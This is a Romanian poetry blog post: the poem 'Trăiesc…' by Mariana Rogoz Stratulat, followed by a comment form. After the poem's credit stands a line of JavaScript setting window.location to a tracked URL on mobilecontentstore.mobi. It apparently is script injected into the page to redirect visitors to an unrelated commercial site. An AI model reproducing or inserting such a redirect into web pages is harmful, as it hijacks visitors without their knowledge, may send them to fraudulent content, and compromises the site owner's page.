Viaţa este un extraordinar mister…

Trăiesc…

Trăiesc în circul vieţii temporar,
îmi spumeg frigu-n cer fără hotar,
în lacrimi strig săruturi iertătoare
şi-mi ard veşmintele de-nvingătoare.

Trăiesc în vorba primului minut
mânjit de umbre negre şi de lut
şi mă ascund în ochii lui Iisus
să-mi cânte plopii doruri în apus.

Trăiesc în chip, trăiesc în coastă,
trăiesc în gleznă ca nevastă,
trăiesc în barză şi-n ţestoasă,
în firul retezat de coasă.

Trăiesc cu moartea într-o colivie
jucând frenetic până la chindie
sfârşitul gălbenuşului din ou
şi naşterea nimicului din nou.

Trăiesc grăbit sau poate mi se pare
că sunt lumină albă-n depărtare,
că sunt armură roasă, cenuşie,
că sunt o mască vie în pustie.

Mariana Rogoz Stratulat
Tăcerea fumegândului cuvânt, ed. PIM, Iaşi, 2010

maxresdefault

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>